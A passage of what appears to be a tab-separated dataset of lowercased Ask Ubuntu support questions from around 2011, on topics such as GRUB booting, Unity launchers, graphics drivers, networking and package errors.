is my main working environment right now . instead i 'd rather install grub on the linux drive and then give it priority in the bios boot order . once i can boot into linux successfully , then i 'd be open to making other changes . any help to get grub working on the linux drive ( pretending that the new windows 7 disk does not exist ) would be greatly appreciated details output of fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2889808c device boot start end blocks id system /dev/sda1 * 1 18662 149902483+ 83 linux /dev/sda2 18663 19457 6385807 f w95 ext 'd ( lba ) /dev/sda5 18663 19457 6385806 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xfeffeeaa device boot start end blocks id system /dev/sdb1 * 1 38914 312568832 7 hpfs/ntfs disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x13944bce device boot start end blocks id system /dev/sdc1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sdc2 13 14594 117115904 7 hpfs/ntfs
45687	how do i change from clone to xinerama mode in kubuntu ?	i have an ati radeon hd 5700 with 2 monitors . in windows 7 i can use both screens fine ( i mean like having a single monitor ) . i have also installed kubuntu , but when i log in , the monitors are cloned . what must i do in kubuntu ?
45698	partition problem on installation	i am trying to install ubuntu 11 to dual-boot with windows 7 ( my main os ) . here is screenshot of disk management on windows : as you can see i already shrinked volume d : for 16gb , where i am about to install ubuntu . however , in ubuntu installation , i see no partitions at all . then , i launched disk utility , and here what it showed : check the size of last out-of-nowhere partition . obviously something is wrong with my partition table . what can i do ? thanks .
45699	can i share my internet ( lan ) through wifi ( adhoc ) connection via a laptop ?	is there a way i can share my lan internet connection through my wifi when i has an mesh connection from my android through the open garden wifi tethering app ( a wifi tether ap mesh client ) ? link to : open garden wifi tethering app : https : //market.android.com/details ? id=og.android.tether & feature=search_result
45702	all browsers with one icon in the launcher !	i 'm trying to create my first launcher for unity that works like this : when i use the left-click , it opens the browser set as default on the system when i use the right-click it opens 3 shortcuts related with the other browsers of the system . but i 'm having this problem : for each shortcut , unity is duplicating the icon on the launcher . i wan na all the browsers set on the same icon . is that possible ? here is the code : [ desktop entry ] version=1.0 name=brox comment=navegue pela internet genericname=brox exec=sensible-browser % u terminal=false type=application icon=/usr/share/icons/faenza/apps/scalable/brox.png categories=network ; webbrowser ; mimetype=text/html ; text/xml ; application/xhtml+xml ; application/xml ; application/vnd.mozilla.xul+xml ; application/rss+xml ; application/rdf+xml ; image/gif ; image/jpeg ; image/png ; x-scheme-handler/http ; x-scheme-handler/https ; x-scheme-handler/ftp ; x-scheme-handler/chrome ; x-ayatana-desktop-shortcuts=google chrome ; firefox ; opera ; [ google chrome shortcut group ] name=google chrome exec=/opt/google/chrome/google-chrome % u onlyshowin=unity [ firefox shortcut group ] name=firefox exec=firefox % u onlyshowin=unity [ opera shortcut group ] name=opera exec=/usr/bin/opera % u onlyshowin=unity thanks in advance
45704	unable to right click and change theme	nothing happens when i right click on the desktop area . i am unable to change the theme and when i take display settings only wallpaper settings is displayed . i upgraded to gnome 3 of late . now i have both ubuntu unity and gnome 3 in the box
45708	where can i find the sha256 hashes of ubuntu images ?	i 'm trying to securely validate the hash of a downloaded ubuntu-11.04-alternate-amd64.iso but it seems i just ca n't find any . i found this site : https : //help.ubuntu.com/community/ubuntuhashes but there are only md5sums on it . about md5 's security : https : //secure.wikimedia.org/wikipedia/en/wiki/md5 # security where are the sha256 hashes of ubuntu images ? http : //releases.ubuntu.com/11.04/sha256sums is not a solution , because it 's not using valid https . verifying the sha256sums with gpg is n't the solution either , because not everyone has the public key , so we have to import it with : gpg -- keyserver hkp : //keyserver.ubuntu.com -- recv-keys 0xfbb75451 and i think using this method could be compromised ( when importing the keys ) .
45711	need software to track login and logoff timings	i am in a need of software which can track login and logoff timings on user basis . if possible , software should be cross platform . if you know such software , please share .
45714	in gnome 3 shell , in applications tab i can not see any icon . how to get it ?	earlier when i clicked on the applications tab button from `` activities '' , the icons used to be listed , now i see none . i am using gnome 3 ppa .
45717	is there a way to left-click links in gnome-terminal or am i out of luck ?	i 'm using irssi hosted on a remote computer for irc , and it 'd be super helpful not to have to hold control or right-click every single link ( so i can avoid multiple clicks or multiple hands ) . at this point i 'm willing to download gnome-terminal 's source and manually patch it and rebuild the package .
45720	how to get a usable desktop on ubuntu 11.04 ?	i naively updated to ubuntu 11.04 ; in the past i never had problems with ubuntu updates . but 11.04 totally messed up my desktop . my task bar at the bottom is missing the bar at the top mixes up window titles and menus the new bar at the left constantly disappears and i need to pull the mouse 3 to 5 times against the left border to show it again , extremely annoying to switch windows i do n't see how to keep it visible i do n't see how to pull that bar to the bottom i do n't see how to open two terminal windows , it just actives the existing window the upper half of the first icon random flashes up on the screen when i do things not related to that bar i do n't see how to start programs without typing in the name . okay , there are videos saying that is is a super cool feature , but i 'd still prefer the menu . how do i get a working desktop environment back ? preferable the gnome environment i had before the update .
45721	unity launcher shows two questionmarks when running pymol	pymol is started through a wrapper script . once it runs i get two questionmarks in the launcher . pymol itself has an icon in the dash . but as 'pymol ' is only the wrapper this icon is not used when the other two instances are running . i 've had a look at the script at /usr/bin/pymol but could not figure out how to continue . i guess i have to create .desktop files for each launched window then , but i do n't know their name . among the running process i can only see `` python2.6 '' . i think creating a .desktop-file for python2.6 would not really help if i want to use different icons for each window . any idea ? pymol : http : //apt.ubuntu.com/p/pymol ( python games only showing python icon , but not game icon : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/777417 )
45724	how to prevent an application from showing up in the unity panel ?	i need to remove an application completely from the unity panel , this post is a good start , it shows how to remove the menu but it does not remove the name from the panel . how can i do that ? here is a picture of the text i want removed as requested .
45726	kill modem-manager process	i would like to use the script sakis3g . and i need to kill modem-manager in order to use it . i use sudo killall modem-manager but process keeps restarting . is there a way to kill it ?
45729	kvm : virt-install `` unsupported sound model 'ich6 ' ''	is it possible to add `` intel hd audio '' to a kvm vm with `` virt-install '' in ubuntu 11.04 ? using `` kvm '' could do this so i think it is only a problem of virt-install , maybe the script needs an update . on fedora 15 `` -- soundhw ich6 '' works perfect .
45732	getting apache to be able to write to a folder	i 've been tinkering with apache2 in ubuntu and am trying to get a script of mine to be able to create files . it does n't seem to be working , sadly . i think the issue is that whichever user is running does n't have the right permission to create files . i 've been going round in circles with this , though - i thought i had set the permissions for the /var/www ( it 's testing only so i 'm not worried about security ) to 777 . still no luck . is there anything i 'm missing ? i 've tried : adding my main user to the www-data user group ; setting www-data as owning the /var/www folder , and lots of other attempts besides . what have i missed ?
45733	hp dv6 2011 brightness keys do not work	i 've searched around and no solutions seem to work that worked for older models . not sure what to do next . i 'm unable to change my brightness with the keys on the keyboard . i can however use the gnome power management preferences dialog to do so and can use e.g . echo 10 > /sys/devices/virtual/backlight/acpi_video0/brightness and everything works great . when running xev i get no output for the brightness button presses or releases , and i do n't have /proc/acpi/lcd or anything related to the screen . any help would be appreciated and i can post any relevant system information if it will help , just let me know what to do . here 's the pastebin link to acpidump.txt as requested .
45734	why ca n't i run a program i manually installed in /opt/ ?	i 'm trying to install a game called teeworlds . i plan on installing it inside of /opt since it is stand-alone and from what i 've read this is the right place for it . however , i 'm having trouble doing this . i type in the following command in the terminal : tar xvzf ~/teeworlds.tar.gz -c /opt but it gives me errors since i do n't have enough permissions . so i try doing this with sudo then it works but then i do n't have enough permission to access the teeworlds folder because it is now owned by root . i understand that i can do chown and all that stuff but is it really this much trouble to get something like this to work or am i just doing something wrong ?
45736	check burned ubuntu cd	my os is ubuntu 10.10 . i have burned ubuntu 11.04 into a cd . now i tried to check the cd following https : //help.ubuntu.com/community/howtomd5sum # check % 20the % 20cd , as following : $ ls -l -rwxrwx -- - 1 root plugdev 718583808 2011-05-19 10:26 ubuntu-11.04-desktop-i386.iso $ dd if=/dev/cdrom bs=1 count=718583808 | md5sum dd : reading `/dev/cdrom ' : input/output error 718581760+0 records in 718581760+0 records out 718581760 bytes ( 719 mb ) copied5f0528a1b0a834bcf6d25f0b52d97736 - , 3918.18 s , 183 kb/s my questions are : i found my cd appears as /media/ubuntu 11.04 i386 , why not verify it , but to verify /dev/cdrom ? why did i get `` dd : reading `/dev/cdrom ' : input/output error '' , and only 718581760 out of 718583808 bytes are processed ? how shall i check the cd then ? thanks and regards !
45738	flickering with experimental driver on a geforce 8200m	i 've just installed natty in a laptop with a non-working back-light , so i have to use an external monitor in order to see anything . the problem is that the two nvidia proprietary drivers available wo n't recognize the external monitor . when using the `` classic '' configuration or uninstalling the additional drivers linux detects the monitor with no problems . on the other hand , the experimental driver detects the screen and works fine ( effects and all ) but i have flickering issues ( they take the lower half of the screen , especially if i 'm watching a video ) like every hour , and some times they 're very annoying . i 'm thinking of either installing a previous version of ubuntu and seeing how it works or staying with the default driver and no effects at all . my video card : nvidia geforce 8200m g ( 256mb ) laptop model : compaq cq50-204ca , 3gb ram
45746	where do i find the default ambiance theme ?	where can i find the source code for the default gtk theme for ubuntu ? my google-fu has failed me and i 'm not finding the code for it .
45751	kupfer problem focusing when started	kupfer is a great launcher for my not so powerful laptop if only the program would work properly . every time i bring up the app it will not get focus . so iâve to press the app first before i can search anything . surely this is not the way things are suppose to be . anyone had the same problem and found a solution ?
45753	accessing ie only sites	still there are companies who believe windows is the only os and ie is the only browser around . this prompts them to make sites which can be accessed only in ie . though i have dual-boot system i boot into windows only once in several days . i do n't want to boot into windows just to check my internet usage ( yes , it is my isp 's site - http : //selfcare.sdc.bsnl.co.in/ ) . the site does not allow me to enter my username and password in firefox/chrome in ubuntu . when i take my mouse pointer over it , it just keeps circling ! and now it has started showing bad gateway . the proxy server received an invalid response from an upstream server . ironically it seems to use apache/2.0.52 ( red hat ) server . so there they need linux ! is there any way out for such issues other than installing windows on a virtual pc ?
45755	installed ubuntu and it corrupted my windows partition , how do i get the data back ?	its the weirdest thing or so i thought until i found that it has happened before . i tried to use testdisk to rebuild the mbr but instead it deleted the partition , but not the data which its currently in a 100gb or so portion of unallocated disk space . testdisk says it ca n't restore the partition , no problem i dont care about windows but i need to get those files back . what can i do ?
45762	how can i stop a terminal connection from timing out	at work i have two machines : windows xp and ubuntu 11.04 . on my xp machine i use putty to connect to some servers and can leave those windows open for weekends without them timing out . however , when i connect tot the same serves from my ubuntu box with terminal , my connection times out before i even return from lunch or a meeting . is this by design or is there a setting i am missing ?
45763	have to manually launch unity after upgrade	i upgraded from 10.10 to 11.04 first week of may . unity wo n't launch on its own . after logging in the title and sidebar are unavailable ( even though i chose ubuntu as session during login ) and i have to open a terminal and launch unity for everything to show up . i 've been trying to find a better solution for the last two weeks but no success . i 've looked at compiz settings and the ubuntu unity plugin is checked . i 've also checked and my system supports unity ( ran /usr/lib/nux/unity_support_test -p and it was all yes ) . anyone have any pointers ?
45764	how to turn my dell mini 10v to become a wifi hot spot ?	on natty , how to turn my dell mini 10v to become a wifi hot spot ? i would like to share my usb broadband with my android device and ipad .
45766	how can the unity toolbar at the left be moved to the bottom & auto-hide activated ?	hi , i like ubuntu 11.04 , but i ca n't work with the toolbar at the left hand side . how can i move it to the bottom ? i 'm also interested in finding out how to activate auto-hide , because i need an empty screen for writing code and text . thanks , jochen
45768	command line ifconfig problems - not detecting all nics	i am in the command line of ubuntu server edition 10.04 and i have 3 nic cards installed . when i type ifconfig it only detects one : eth0 . i tried doing sudo apt-get update , this did not work . any ideas on how to fix this ?
45772	playing music or movies kills my wifi	i 'm running 10.10 on a desktop and i have two routers : the first connects to the internet and serves dhcp addresses to my devices , the second is a wifi lan around the house . both routers run tomato firmware . my issue is whenever i play music on my desktop ( using mpd/ncmpcpp ) or a video ( either totem or vlc ) conky reports my upload speed at around 200kb/s and my wifi lan goes down . as soon as i stop mpd or vlc the network comes back up . how would i go about troubleshooting this ? edit : interestingly enough , the lan stays up when i use skype edit 2 : after following ijk 's suggestion , wireshark show that port 46560 is being flooded . lsof shows that it is pulseaudio : pulseaudi 2190 jason 39u ipv4 14110 0t0 udp mybox:56751- > 224.0.0.56:46560 seems it is a bug : https : //bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/411688 update the solution , from an admittedly sketchy memory , is to install and open the pulse audio control settings and disable netwrok broadcasting -- this will stop pulse flooding your network .
45781	select specific twitter in gwibber without seeing the rest i follow	how can i configure gwibber to show me only 1 twitter of the group i follow . for example i wish to see a specific one of them without having to see all of the ones i am following .
45783	cd metadata : finding and contributing	i am transferring my cd collection to .flac files so i can enjoy it from my laptop . i have been using banshee and sound-juicer for the rip and conversion . for some cds , the metadata ( album name , artist name and track name ) is missing for both applications . i would like to : make sure the data is not out there on the internet , and if it really is n't , update it myself to a totally free db so that any future user would benefit from my work . is there one central db for cd metadata ? where shall i search and update the cd metadata in the most effective way ?
45785	compiz not showing complete windows	when i work with compiz as windows manager , my windows are not complete ( title bar is missing and white - no longer colored ) . i can not move the windos either . when y go back to metacity no problems . i had to install compiz fusion icon for do this change , and i work no longer with unity-2d .
45789	problem installing lubuntu 11.04	after i boot the live-cd i ca n't select try lubuntu or install lubuntu and i end up hanging on that screen . my pc specs are : compaq presario s4214bd 2.4ghz intel celeron . windows xp/ubuntu 10.04 dual boot . 768mb ram . nvidia 6200 graphics card ( i 've switched between the onboard and pci ( this one ) still no luck ) . i really want to use lubuntu and i 've been trying everything for the past 2-3 hours . anything will help .
45793	xchat disappearing after minimize to tray	when i click to close the xchat window , it asks whether to `` quit '' , `` cancel '' or `` minimize to tray '' . if i select `` minimize to tray '' then the xchat disappears and i am not able to see the application again . i have checked the process list and it is there in running state . normally in earlier versions of ubuntu it would show a xchat icon in the top panel bar . i have not added the xchat as sticky icon in my application panel . i hope there must be some work around or setting for it .
45794	why does ubuntu log out suddenly ?	i have no idea why ubuntu will log out by itself without any notification . there are risks that i may not be able to save some important changes made to my documents , or totally lost the files that i am downloading . can anyone provide me some clues so that i now whether or not i should go back to windows 7 pro ?
45797	fully automatic updates in kubuntu	it is really annoying to click the update icon and enter password every time to confirm updates . how can i setup fully automatic updates without any prompts ? ( not only security updates ) some small notification about finished updates would also be nice . i 'm using kubuntu 11.04 and kpackagekit .
45799	how to configure a lan connection between two ubuntu machines ?	i have installed ubuntu on two of my desktops pc 's . i have not installed any addon packages or anything related to network as yet . please guide my on how to set up a lan between these two machines . is there any gui program to do this instead of terminal ? i have the ethernet cable connected to a router which in turn is connected to my dsl modem to provide internet access to both my pc 's .
45800	ubuntu account keeps quiting	i have been running ubuntu on my dell vostro 1520 for a few months , and the latest 11.04 version of ubuntu since it was released . as of a few hours ago , my account keeps quitting every couple of minutes . the os is still running , but i am returned to the login screen , and when i login , no applications or documents are open . is there a standard procedure i should follow to troubleshoot this ? when it quits i typically have gedit , google chrome and the terminal open , with a few tabs in terminal running rails server , rails console , etc . many thanks , steven .
45804	i have a windows app which requires .net 3.5 . can wine handle .net 3.5 ?	i do n't know/understand much about this , but i believe mono is an open-source alternative to .net ... but whatever its actual niche is , i really do n't know the best way to go about trying to get my windows app to work in wine .. i 'm getting a bit fed-up with running a vista vm just for this one app ; i 'd much rather see it in wine i tried installing 'mono for windows ' in wine , but my app did n't run , but i really do n't have a handle on wine yet , to know if i did something wrong , or it just does n't work.. i 've read reports of success and failure using mono in wine ... so now i 'm thinking of just installing ms dotnetfx35.exe in wine , but if it does n't work , i really wo n't know if it just requires a simple tweak , or not ... my main question , is : can ms .net 3.5 run under wine , and if so , can someone direct me to a how-to ... ( simple knowing if it wo n't work , would save me a lot of wasted time trying to get it working ... ( there is no linux/open-source alternative for the app.. )
45813	how to make quicklist for vlc media player with playback controls	i am trying to make a quicklist for vlc that has playback control , if possible . using this link as reference , i 've made a copy of vlc.desktop and added the following to the bottom in gedit : x-ayatana-desktop-shortcuts=play ; pause ; stop ; next ; prev [ play shortcut group ] name=play exec=vlc -- play targetenvironment=unity [ pause shortcut group ] name=pause exec=vlc -- pause targetenvironment=unity [ stop shortcut group ] name=stop exec=vlc -- stop targetenvironment=unity [ next shortcut group ] name=next exec=vlc -- next targetenvironment=unity [ prev shortcut group ] name=prev exec=vlc -- prev targetenvironment=unity so far i 'm having no luck getting it to work properly .
45814	network manager 0.8.999 and ubuntu one	is there a way to make ubuntu one understand that i have a network connection after upgrading to network-manager-0.8.999 ? fyi : update manager also thinks that i have no internet-connection , but ignores the fact and continues .
45821	simpler alt-tab in unity	i am looking for a simpler alt-tab in unity . the default application switcher takes 0.5 seconds to load , far too slow . some other compiz application switcher are fast enough , but they make me sick because everything is moving on the screen . call me conservative , but the old gnome application switcher was perfect for me : extremely fast just show the icon ( maybe window title too ) , not a miniature of each window . does not move icons around , just a cursor moving from one icon to the next . all icons are visible at the same time ( not just 3 of them for instance ) . any way to get this behaviour ?
45822	whenever i use alt-tab , firefox display freezes	i installed ubuntu 2011.04 from scratch a few hours ago . at first firefox was working perfectly . then i selected `` static application switcher '' in the compiz configuration . from that time , whenever i press alt-tab , firefox 's display is frozen . as hinted by the changing mouse cursor , i can click on link and select text , but i can not see it . if i restart firefox or simply unmaximize/remaximize it , the problem is gone , until the next alt-tab . what 's going wrong ? how to go back to the deafult ( non compiz ? ) application switcher ? note : i am using the proprietary ati driver ubuntu proposed me to install .
45826	is it possible to read/write software reviews in different languages ?	does anyone know if it possible to write/display a review in a different language than your own primary one in the software center ?
45828	ati cards need mesa 7.11 . where can i find it	ati radeon cards require natty/11.04 and modesetting only these cards should work with ubuntu natty/11.04 , however you will need a more recent version of mesa ( 7.11.x ) than natty 's default ( 7.10.x ) to get 3d acceleration . how do i get mesa 7.11 ?
45839	can anyone recommend a good vlc alternative ?	i 'm getting sick and tired of vlc . the issues are too many to mention in detail , but generally : bugs ( ballooning out of memory on fake/exotic movies , leftover windows , many others ) and the ergonomics that would be more appropriate for a 1995 application . are there any good alternatives ? things that are important to me : resources usage footprint , formats supported , ergonomics .
45840	can compiz prevent overlap with a specific application window ?	i would like to reserve screen space for an application , i.e . prevent other windows from overlapping with it when they open or maximize . can compiz do that ? and how ?
45841	which usb_modeswitch.d file do i need to use ?	how do i configure usb_modeswitch on ubuntu 10.04 ? when the device is pluged in lsusb gives : oshirowanen @ laptop : ~ $ lsusb bus 001 device 004 : id 19d2:0103 onda communication s.p.a . when i eject the device manually to get it to be recognised as a modem , lsusb gives : oshirowanen @ laptop : ~ $ lsusb bus 001 device 003 : id 19d2:0031 onda communication s.p.a. zte mf636 so then i searched for 19d2 and got : oshirowanen @ laptop : ~ $ sudo updatedb & & locate 19d2 /etc/usb_modeswitch.d/19d2:0053 /etc/usb_modeswitch.d/19d2:2000 /etc/usb_modeswitch.d/19d2:2000 : upr=usb_zte /etc/usb_modeswitch.d/19d2:2000 : upr=zte_cdma /etc/usb_modeswitch.d/19d2 : fff5 /etc/usb_modeswitch.d/19d2 : fff6 so it seems there is no usb_modeswitch.conf file in ubuntu 10.04 , instead i get these files in /etc/usb_modeswitch.d do i need to use one of these 19d2 files , if so , which one and how ?
45842	ubuntu software center reviews in own language	can i only see the reviews written in my language ? this is immensely annoying , not a lot of dutch speaking people write reviews . and when they do , they write it in english anyway .
45845	is there any chat clients that work behind authenticated proxy server ?	i am behind an authenticated proxy server and i have set it up via system- > preferences- > network proxy configuration and applied system-wide . but most of the chat clients ( primarily to access gtalk ) do not make use of this setting or even do not work with application specific proxy settings if any . i have found no luck with empathy , pidgin etc . so is there a chat client that works fine behind an authenticated proxy server ? equally well will be to get any idea to get a workaround for the problem with empathy etc . i am using ubuntu 11.04 with gnome-classic if that matters
45849	how do i configure ubuntu 11.04 and windows 7 network ?	i am using ubuntu 11.04 on a dell inspiron . i use internet through a adsl router used my several other computers at home . i want to connect my laptop to a toshiba satellite with windows 7 through lan . i have connected a network wire between the two laptops but the windows machine says that i am connected to an 'unidentified network ' and the ubuntu machine tries to connect to the network but eventually says 'wired network disconnected ' no matter how many times it try to connect . there must me something wrong with my settings . can anyone help me out ? i want to eventually be able to use the same keyboard and mouse in these two machines using synergy and i also want to share files .
45850	no ethernet after hibernation	i have quite a big problem . i did this : i have win 7 for quite a long time i have installed ubuntu 11.04 as dual boot with win 7 first day ( also during installation ) wired internet was running . i have tried to hibernate ubuntu - > laptop was turned off 5 ) i turned on laptop next day . from dual boot menu i have picked ubuntu but there was a prob.. just black screen i have done hard reset from that point ethernet ( wired internet ) is not running . in ubuntu i have following error : siocsifaddr : no such device eth0 eth0 : error while getting interface flags : no such device i have no idea what to do and i can not understand how can this effect both systems . if you have any also small hints let me know , i 'm desperate.. thx
45860	fan starts at startup ( macbook pro 6,2 )	i recently installed ubuntu 10.10 onto my macbook pro 6,2 unibody . i 've got everything setup ( not my first time ) , except on startup the fan goes crazy . i choose linux from refit , and after grub the fan turns up to what i think is the highest speed . the computer definitely is not overheating . it does n't do this when booting mac os x. macbook pro 6,2 unibody ( 15 '' ) ubuntu 10.10 kernel 2.6.35-28 generic mactel ppa ( pommed , etc . )
45861	graphical random generator	is there a random generator for linux with a nice gui , which can generate a random integer between two integers and display it with a large fontsize ?
45863	why does a search-thingy appear on startup all of a sudden ?	why does this appear right after login in all of a sudden ? it 's in the middle of my primary monitor . when i press esc it disappears . it started to show up the other day for no apparent reason . it has kept showing up after every login since then . what does it do and how do i get ridd of it ?
45870	which should i recommend , 10.04 vs 11.04 ?	i 've been running 10.04 for a while now . i use it for development purposes and recreation , and i love it . my friend recently had to reformat his computer because he got a virus . naturally , he is looking to try out ubuntu ( instead of his windows 7 ) .my friend would only use this for recreation/writing papers/etc. , and he is not that tech savy . i am torn because i know 10.04 would be more stable for him , but the 11.04 desktop looks interesting . from your experience , are new features in 11.04 worth the instability ? for you users of 11.04 , how stable is it ? does it have noticeable problems ? i know it 's a matter of preference , so i 'm searching for opinions . should i recommend 10.04 or 11.04 ? thanks for your responses !
45871	bluetooth does n't start up properly when i start up	basically , bluetooth via my usb dongle does n't work until after i manually /etc/init.d/bluetooth restart a few times . is there a way to have it start automagically so i do n't have to do this each and every boot ?
45876	some menus look incorrect	can someone explain to me why a clean install of 11.04 , x64 is having these strange menu issues ? example : this seems to happen on a few `` right-click '' menus , and not all system menus are affected . can someone give me hand on fixing this ? i am using ubuntu classic for my session
45881	unable to kill process with 'kill -9 ' whose ppid=1 and using 100 % of cpu ?	direct question : flash under firefox 4.0 , npviewer.bin , in kubuntu 10.04 was running at 100 % and i could n't kill it . i tried : sudo kill -9 12996 sudo kill -15 12996 i logged in as root and ran both commands . the ppid was listed as 1 . ( ca n't kill init without rebooting ) . i , as root , issued a reboot command and also a shutdown now . i went through the list of running processes and manually killed every single process most became < defunct > . the system has a raid 5 without a battery backup -- so i do n't like yanking the cord out of the ups , but this is what i ended up having to do . is there something else i should 've tried ? some other command to run ? it was using 100 % of the cpu , and i need to finish my dissertation , so i just forcibly turned off the computer , but if it happens again , i 'd like to be prepared . note : i also renice 'd the process to 19 and it 'took ' -- i.e . it responded that the process was now at nice 19 and was at nice 0 . however , it was still using 100 % of the cpu . background : a friend was using the computer , so i have n't yet cycled through the history to see if there was anything malicious , but it crashed when he started firefox and it returned to espn 's fantasy baseball website -- not a place i would expect flash malware to grow ... any thoughts ?
45884	why are the manually added notification icons do n't hide when using workspace switcher ?	for example ; notice emesene and desktopnova before and after clicking super+s
45885	how do i set a `` custom '' browser as default in preferred applications	i 'm trying to set up conkeror as my default browser . however , in the preferred applications menu , this is not an option , nor do i see a method of inputting a custom setting/command . does anyone know a way round this ? [ edit : i 've tried ( 1 ) using sudo update-alternatives -- config x-www-browser as well as using gconf-editor to edit /desktop/gnome/url-handlers/http , /desktop/gnome/url-handlers/https , /desktop/gnome/applications/browser/exec . neither of these seems to work. ]
45892	music player that plays youtube playlists	i have tried all music players recommended in answers for similar questions , but i have n't found a player meeting the following requirements : plays youtube playlists smoothly ( caches the audio before playing , i mostly do n't care about video ) allows to choose quality normalizes volume lightweight is there such a music player ?
45898	how can i rebrand ubuntu software center	i 'm making a custom remaster of ubuntu and i want to change the name of the software center . how can i do that ?
45901	firefox 4.0.1 is hanging when streaming movies	when i am watching streaming movies on firefox 4.0.1 running on ubuntu 11.04 ( ubuntu classic desktop ) , firefox is stuck/hung , and i am unable to close/kill it through gui such as closing the window etc . however , sometimes i could hear the dialogues of the movie , but the firefox is still hanging . rebooting seems to be the only option in this situations . therefore , i needed to go to console ( through ctrl+alt f1 ) and need to reboot the machine . please let me know a solution for this problem .
45905	terminator command history	i have been looking into this - but i ca n't get previous entered commands in terminator ( multi-terminal ) . i have looked into the preference but i do n't see how it is done . i know this is not really ubuntu question , but i am sure many of you have used terminator . does anyone know how to get the previous entered commands ? thanks !
45912	issues when upgrading gnome-session	i 'm having issues since yesterday after an upgrade . gnome session got messed up somehow and now i can not install further upgrades nor new apps . here is what i got from terminal after doing the recommended apt-get install -f ; ( reading database ... 166876 files and directories currently installed . ) preparing to replace gnome-session 3.0.1-0ubuntu1~build2 ( using ... /gnome-session_3.0.2-0ubuntu3~natty1_all.deb ) ... unpacking replacement gnome-session ... dpkg : error processing /var/cache/apt/archives/gnome-session_3.0.2-0ubuntu3~natty1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/xsessions/gnome-shell.desktop ' , which is also in package gnome-shell 3.0.1-0ubuntu1~build1 errors were encountered while processing : /var/cache/apt/archives/gnome-session_3.0.2-0ubuntu3~natty1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) in var/log/apt/history.log , it says : start-date : 2011-05-29 17:56:16 commandline : apt-get -f install upgrade : gnome-session : amd64 ( 3.0.1-0ubuntu1~build2 , 3.0.2-0ubuntu3~natty1 ) error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2011-05-29 17:56:21 no idea what all this means .
45914	the development at getting things gnome is continuing ?	i like getting things gnome ( gtg ) application and i want to know if the development on this application is still active . do you know something about this ? as far as i see from their website the last release was in 04/2010 . is the development still active ?
45915	unity 2d on 10.04 ?	why is there no unity support for lucid lynx ? the newer versions of ubuntu are too buggy - the lts version is well supported . why does canonical not work on any new features as unity for this current lts release ?
45920	kubuntu flash fullscreen glitches	machine : thinkpad edge14 kubuntu 11.04 x64 w/ firefox flash64 and java6 when launching fullscreen flash videos , the video will be placed on the background and the main window has to be minimized to view the video ( this glitch can be replicated on windows7x64 as well so i 'm assuming this is either flash or firefox problem ) related to problem # 1 ; the first problem would n't be too much of a trouble if minimizing the window worked all the time ; sometimes the flash video does n't get redrawn into fullscreen ; i click the fullscreen button , the video freezes but audio continues , minimize window and nothing happens , restore original window and the video continues in the embedded player ; sometimes have to click the fullscreen quite a few times for it to actually be redrawn to fullscreen related to problem # 1 ; when minimizing the main window to view the fullscreen video in the background , the taskbar remains in view and does n't get transposed by the video ( problem for sites like megavideo where the video seekbar is at the bottom of the screen and can not be accessed due to the protruding taskbar ; temporary fix is to switch the taskbar visibility settings from `` always visible '' to `` windows can cover '' ) and lastly , when launching a flash video to fullscreen the screen completely blackens ( sometimes w/ audio and sometimes w/out ) and the entire desktop environment is inaccessible ; pressing `` esc '' does n't dismiss the new black screen , can not `` alt + tab '' to running process in the background and no shortcuts work anymore ( force logout does n't work , menu launch shortcut does n't work ) ; only thing that works is hard shutdown by holding the power button down for five+ seconds . this glitch has occurred quite a few time and is not a one-off error . majority of my time on the computer is online surfing and watching videos so this is a big problem , especially the last one where any unsaved data is lost when i have to do a hard shutdown . if anyone knows how to fix any of these problems , i would very much appreciate your help . thank you .
45922	did ubuntu move from installing an mta by default to not installing an mta by default ?	i recently set up a new computer with ubuntu 11.04 amd64 , set up as a desktop . i had n't got around to setting up an email client to read system mail , and i was curious what unread mail might have built up . i was surprised to find that /var/spool/mail was empty , that /etc/aliases did not exist , and that neither exim4 nor any other mail transfer agent ( mta ) was installed . my previous computer had exim4-light installed , and i had reconfigured it a few times , but i do n't remember installing it . i had started with ubuntu 8.04 , and upgraded it in place with each release as they were released , until 11.04 . i 'm wondering if exim4-light was installed by default with some earlier release of ubuntu , or if it was installed as a dependency of something else i installed . ( i 'm also wondering whether to bother installing an mta , as perhaps checking routine system mail was a waste of time better spent playing minecraft , but that 's probably a subjective question . )
45925	`` caps lock on '' message is shown too much time ?	`` caps lock on '' message is shown too much time on ubuntu 11.04 . could anyone tell me how can i reduce the time , please ?
45926	splash screen does n't show on boot	actually , that 's slightly misleading , but titles ought to be simple . i have a splash screen : -for about two seconds during boot , right before the login screen appears . -during shutdown . during boot i just see the same purple as used by grub . ( edit : when grub 's background is changed , so is the one during boot , so grub seems to be ... covering it ? ) this has happened since i installed 11.04 . 10.04 and 10.10 's splashed worked fine for me .
45927	how to find out what codec is being used in a video	how can i see what codec was used in a video ( audio/video ) and extra information about what to use to reproduce the same compression/quality to the video .
45928	which desktop package am i actually using ?	i 'm a desktop user and boot straight into it . what 's the best way to tell which desktop package i 'm using ( both kind and version ) , despite what would normally come with ubuntu , and despite how it 's configured or visually customized ? i assume this info is stored in a configuration file somewhere for viewing , or queryable in some programmatic manner .
45929	virtual terminals messed up with proprietary nvidia graphics driver	at the current moment if i press ctrl + alt + f1 i get a blank screen for a few seconds then the bottom is filled with a mess of pixels ( mainly white and a bit of brown ) . when i put in the open source drivers the virtual terminals work just fine , but i have no graphics acceleration : ( . any way to fix the terminals with the proprietary driver ?
